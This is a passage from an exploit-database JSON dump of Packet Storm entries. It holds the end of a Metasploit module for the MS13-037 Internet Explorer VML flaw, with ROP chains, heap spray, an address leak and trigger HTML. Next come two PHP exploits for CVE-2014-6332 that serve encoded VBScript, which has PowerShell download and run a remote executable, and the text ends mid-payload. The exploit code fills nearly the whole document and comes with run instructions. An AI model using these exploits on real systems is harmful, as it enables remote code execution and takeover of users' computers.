\n@ntdll_base+0x00015789, # xchg eax, esp # ret from ntdll \n].pack(\"V*\") \nntdll_rop = [ \n@ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory \n0x0c0c0c40, # ret to shellcode \n0xffffffff, # ProcessHandle \n0x0c0c0c34, # ptr to BaseAddress \n0x0c0c0c38, # ptr to NumberOfBytesToProtect \n0x00000040, # NewAccessProtection \n0x0c0c0c3c, # ptr to OldAccessProtection \n0x0c0c0c40, # BaseAddress \n0x00000400, # NumberOfBytesToProtect \n0x41414141 # OldAccessProtection \n].pack(\"V*\") \nreturn stack_pivot + ntdll_rop \nwhen \"6.1.7601.17725\" \nstack_pivot = [ \n@ntdll_base+0x0001579a, # ret # from ntdll \n@ntdll_base+0x000096c9, # pop ebx # ret # from ntdll \n@ntdll_base+0x00015799, # xchg eax, esp # ret from ntdll \n].pack(\"V*\") \nntdll_rop = [ \n@ntdll_base+0x45F18, # ntdll!ZwProtectVirtualMemory \n0x0c0c0c40, # ret to shellcode \n0xffffffff, # ProcessHandle \n0x0c0c0c34, # ptr to BaseAddress \n0x0c0c0c38, # ptr to NumberOfBytesToProtect \n0x00000040, # NewAccessProtection \n0x0c0c0c3c, # ptr to OldAccessProtection \n0x0c0c0c40, # BaseAddress \n0x00000400, # NumberOfBytesToProtect \n0x41414141 # OldAccessProtection \n].pack(\"V*\") \nreturn stack_pivot + ntdll_rop \nelse \nreturn \"\" \nend \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n# No rop. Just return the payload. \nreturn code if t['Rop'].nil? \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :jre \nprint_status(\"Using JRE ROP\") \nstack_pivot = [ \n0x7c348b06, # ret # from msvcr71 \n0x7c341748, # pop ebx # ret # from msvcr71 \n0x7c348b05 # xchg eax, esp # ret from msvcr71 \n].pack(\"V*\") \nrop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) \nwhen :ntdll \nprint_status(\"Using ntdll ROP\") \nrop_payload = get_ntdll_rop + payload.encoded \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \n \njs_trigger = %Q| \nvar rect_array = new Array() \nvar a = new Array() \n \nfunction createRects(){ \nfor(var i=0; i<0x1000; i++){ \nrect_array[i] = document.createElement(\"v:shape\") \nrect_array[i].id = \"rect\" + i.toString() \ndocument.body.appendChild(rect_array[i]) \n} \n} \n \nfunction exploit(){ \n \nvar vml1 = document.getElementById(\"vml1\") \n \nfor (var i=0; i<0x1000; i++){ \na[i] = document.getElementById(\"rect\" + i.toString())._anchorRect; \nif (i == 0x800) { \nvml1.dashstyle = \"1 2 3 4\" \n} \n} \n \nvml1.dashstyle.array.length = 0 - 1; \nvml1.dashstyle.array.item(6) = 0x0c0c0c0c; \n \nfor (var i=0; i<0x1000; i++) \n{ \ndelete a[i]; \nCollectGarbage(); \n} \nlocation.reload(); \n \n} \n| \n \ncreate_rects_func = \"createRects\" \nexploit_func = \"exploit\" \n \nif datastore['OBFUSCATE'] \njs_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) \njs_trigger.obfuscate \ncreate_rects_func = js_trigger.sym(\"createRects\") \nexploit_func = js_trigger.sym(\"exploit\") \nend \n \nhtml = %Q| \n<html> \n<head> \n<script> \n#{js} \n</script> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=EmulateIE9\" > \n</head> \n<title> \n</title> \n<style>v\\\\: * { behavior:url(#default#VML); display:inline-block }</style> \n<xml:namespace ns=\"urn:schemas-microsoft-com:vml\" prefix=\"v\" /> \n<script> \n#{js_trigger} \n</script> \n<body onload=\"#{create_rects_func}(); #{exploit_func}();\"> \n<v:oval> \n<v:stroke id=\"vml1\"/> \n</v:oval> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef html_info_leak \n \njs_trigger = %Q| \nvar rect_array = new Array() \nvar a = new Array() \n \nfunction createRects(){ \nfor(var i=0; i<0x400; i++){ \nrect_array[i] = document.createElement(\"v:shape\") \nrect_array[i].id = \"rect\" + i.toString() \ndocument.body.appendChild(rect_array[i]) \n} \n} \n \nfunction exploit(){ \n \nvar vml1 = document.getElementById(\"vml1\") \n \nfor (var i=0; i<0x400; i++){ \na[i] = document.getElementById(\"rect\" + i.toString())._vgRuntimeStyle; \n} \n \nfor (var i=0; i<0x400; i++){ \na[i].rotation; \nif (i == 0x300) { \nvml1.dashstyle = \"1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44\" \n} \n} \n \nvar length_orig = vml1.dashstyle.array.length; \nvml1.dashstyle.array.length = 0 - 1; \n \nfor (var i=0; i<0x400; i++) \n{ \na[i].marginLeft = \"a\"; \nmarginLeftAddress = vml1.dashstyle.array.item(0x2E+0x16); \nif (marginLeftAddress > 0) { \nvml1.dashstyle.array.item(0x2E+0x16) = 0x7ffe0300; \nvar leak = a[i].marginLeft; \nvml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress; \nvml1.dashstyle.array.length = length_orig; \ndocument.location = \"#{get_resource}/#{@second_stage_url}\" + \"?#{@leak_param}=\" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ) \nreturn; \n} \n} \n \n} \n| \n \ncreate_rects_func = \"createRects\" \nexploit_func = \"exploit\" \n \nif datastore['OBFUSCATE'] \njs_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger) \njs_trigger.obfuscate \ncreate_rects_func = js_trigger.sym(\"createRects\") \nexploit_func = js_trigger.sym(\"exploit\") \nend \n \nhtml = %Q| \n<html> \n<head> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=EmulateIE9\" > \n</head> \n<title> \n</title> \n<style>v\\\\: * { behavior:url(#default#VML); display:inline-block }</style> \n<xml:namespace ns=\"urn:schemas-microsoft-com:vml\" prefix=\"v\" /> \n<script> \n#{js_trigger} \n</script> \n<body onload=\"#{create_rects_func}(); #{exploit_func}();\"> \n<v:oval> \n<v:stroke id=\"vml1\"/> \n</v:oval> \n</body> \n</html> \n| \n \nreturn html \n \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nif my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ \nhtml = html_info_leak \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML to info leak...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nelse \nleak = begin \nrequest.uri_parts[\"QueryString\"][@leak_param].to_i \nrescue \n0 \nend \n \nif leak == 0 \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML to trigger...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nreturn \nend \n \nvprint_status(\"ntdll leak: 0x#{leak.to_s(16)}\") \nfingerprint = leak & 0x0000ffff \n \ncase fingerprint \nwhen 0x70B0 \n@ntdll_version = \"6.1.7601.17514\" \n@ntdll_base = leak - 0x470B0 \nwhen 0x7090 \n@ntdll_version = \"6.1.7601.17725\" # MS12-001 \n@ntdll_base = leak - 0x47090 \nelse \nprint_error(\"ntdll version not detected, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML to trigger...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n \nend`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121997/ms13_037_svg_dashstyle.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:45", "description": "", "cvss3": {}, "published": "2015-06-26T00:00:00", "type": "packetstorm", "title": "Havij OLE Automation Array Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-06-26T00:00:00", "id": "PACKETSTORM:132462", "href": "https://packetstormsecurity.com/files/132462/Havij-OLE-Automation-Array-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n# Title : Havij OLE Automation Array Remote Code Execution \n# Affected Versions: All Version \n# Founder : ITSecTeam \n# Tested on Windows 7 / Server 2008 \n# \n# \n# Author : Mohammad Reza Espargham \n# Linkedin : https://ir.linkedin.com/in/rezasp \n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \n# Website : www.reza.es \n# Twitter : https://twitter.com/rezesp \n# FaceBook : https://www.facebook.com/mohammadreza.espargham \n# \n# \n# OleAut32.dll Exploit MS14-064 CVE2014-6332 \n# \n# \n# 1 . run php code : php havij.php \n# 2 . open \"Havij\" and Enter your exploit link http://ipaddress:80/ \n# 3 . go to \"Setting\" and Click \"Load Cookie\" \n# 4 . Your Link Download/Execute on your target \n# 5 . Finished ;) \n \n#Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY \n \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your exe link \n \n$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($reza, 0,$port); \nsocket_listen($reza); \nprint \" Mohammad Reza Espargham\\n www.reza.es\\n\\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\\n\\n\"; \n \n$msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 \nbGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj \ncmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl \nbGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy \nZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG \nSUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh \ndGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl \ncnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 \nbmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg \nYWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg \nIHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt \neWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 \ndAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w \nKSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv \nLCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu \nZm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 \nbmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p \ndCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp \nJmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm \nY2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw \nMCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 \nLndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg \nICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg \nICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K \nIApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy \nZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp \nb24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD \ncmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg \nICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm \ndW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u \nIEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg \nUHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo \nMCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo \nMik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g \nIFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt \nb2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt \nKGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv \nICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo \nZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl \ncnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg \nICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg \nICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg \nZm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 \nNzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog \nICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl \ncj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK \nICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog \nICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz \nNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg \nIElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u \nPDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg \nICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 \nbWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu \nICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g \nICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg \nICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK \nICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg \nICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK \nICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg \nICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 \neXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK \nICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg \nICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 \nZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg \nICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp \nbSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu \nY3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl \ncnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg \nIGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg \nIAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv \nbgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg=='; \n$msgd=base64_decode($msg); \n$msgd=str_replace(\"FILE_DOWNLOAD\",$link,$msgd); \n \nfor (;;) { \nif ($client = @socket_accept($reza)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132462/havijole-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:00", "description": "", "cvss3": {}, "published": "2015-10-22T00:00:00", "type": "packetstorm", "title": "The World Browser 3.0 Final Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-22T00:00:00", "id": "PACKETSTORM:134061", "href": "https://packetstormsecurity.com/files/134061/The-World-Browser-3.0-Final-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : The World Browser Remote Code Execution \n# TheWorld Browser is a tiny, fast and powerful web Browser. It is completely free. There is no function limitation. \n# Version : 3.0 Final \n# Date : 22 October 2015 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Download : http://theworld.cn/twen/download.html \n# Website : http://theworld.cn \n########################################################## \n# 1. run php code : php exploit.php \n# 2. get the output address and open it in browser ! \n########################################################## \n# shot : http://ehsann.info/proof/The_World_Browser_R_C_E.png \n# Original Code : http://ehsann.info/exploit/4.txt \n########################################################## \n \nprint \"TheWorld Browser Remote Code Execution Exploit \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\